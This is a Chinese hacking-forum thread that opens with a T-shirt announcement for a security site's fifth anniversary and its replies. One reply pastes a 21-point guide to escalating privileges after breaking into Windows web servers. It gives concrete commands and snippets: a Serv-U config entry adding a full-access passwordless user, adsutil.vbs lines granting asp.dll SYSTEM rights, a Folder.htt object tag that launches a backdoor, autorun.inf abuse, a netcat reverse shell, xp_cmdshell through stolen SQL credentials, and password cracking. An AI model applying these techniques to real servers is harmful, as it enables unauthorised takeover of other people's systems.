最近看过此主题的会员

返回列表 发帖

非安全5周年纪念 团队T恤出炉

非安全5周年纪念 团队T恤出炉 详情地址:http://www.webapr.com/sitedirsec-5years-t-shirt.html

T恤颜色及数量

性别   白    黑

男       40(件)   40(件)

女       10(件)   10(件)

非安全中国网论坛或者QQ群成员具有优先申请权
论坛非安全基金等价人民币
特殊贡献用户我们将免费赠送

体型参考:男 均码 180CM 身材亦可穿
女 均码 165CM 身材亦可穿

参考图片

 

您可能还想看的主题:

关于网上对非安全中国网团队不实信息是污蔑!

非安全中国网10周年T恤申请及相关事宜补充说明

非安全中国网10周年T恤申请及相关事宜通告

庆祝非安全中国网创办10周年纪念活动 t恤设计进度

好基友的一次完美信息追踪!

我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

dz x3后台拿shell+webshell隐藏

基于各种原因,非安全中国网正进行秘密计划敬请期待

关于信息安全等级保护

Discuz! X2.5 远程代码执行漏洞及EXP

1

评分人数

    • webmaster: 楼主MJJ威望 + 2 金钱 + 2 金 贡献 + 5 非安全基金 + 2 基金
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:瑞佐发表,本帖发表者瑞佐符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者瑞佐和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

这个必须的
兄弟们我来了

TOP

呵呵 希望大家以后能有个纪念!

TOP

求免费送
杨过是额师傅.........

TOP

还有没有呀
!!!1

TOP

回复 5# tianlai64


    这是2012年的活动了。。

TOP

支持 ·一下

TOP

网站入侵提权方法总结
1.radmin连接法
  条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。
2.pcanywhere
  C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 这里下他的GIF文件,在本地安装pcanywhere上去
3.SAM破解
  C:WINNTsystem32config 下他的SAM 破解之
4.SU密码夺取
  C:Documents and SettingsAll Users「开始」菜单程序
  引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转       进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 [USER=WekweN|1] Password= HomeDir=c: TimeOut=600 Maintenance=System Access1=C:|RWAMELCDP Access1=d:|RWAMELCDP Access1=f:|RWAMELCDP SKEYValues=       这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:winntsystem32inetsrvdata
  引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
6.SU溢出提权
  这个网上教程N多 不详细讲解了
7.运行Csript
  引用:运行"cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提升权限 用这个cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps 查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 再将asp.dll加入特权一族 asp.dll是放在c:winntsystem32inetsrvasp.dll (不同的机子放的位置不一定一样) 我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32inetsrvasp.dll" 可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
8.脚本提权
  c:Documents and SettingsAll Users「开始」菜单程序启动"写入bat,vbs
9.VNC
  这个是小花的文章 HOHO
  默认情况下VNC密码存放在HKCUSoftwareORLWinVNC3Password
  我们可以用vncx4
  破解它,vncx4使用很简单,只要在命令行下输入
  c:>vncx4 -W
  然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
  给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了
11.社会工程学之GUEST提权  很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO
12.IPC空连接
  如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令
13.替换服务
  这个不用说了吧?个人感觉相当复杂
14.autorun .inf
  autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行
15.desktop.ini与Folder.htt
  引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码: <OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”> </OBJECT> 然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
  本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了
17.SU转发端口
  43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了
18.SQL帐户密码泄露
  如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
  引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了
19.asp.dll
  引用:因为asp.dll是放在c:winntsystem32inetsrvasp.dll   (不同的机子放的位置不一定相同) 我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32inetsrvasp.dll" 好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去 了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:InetpubAdminScripts>这个目录下. 那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
20.Magic Winmail
  前提是你要有个webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧
21.DBO……    其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表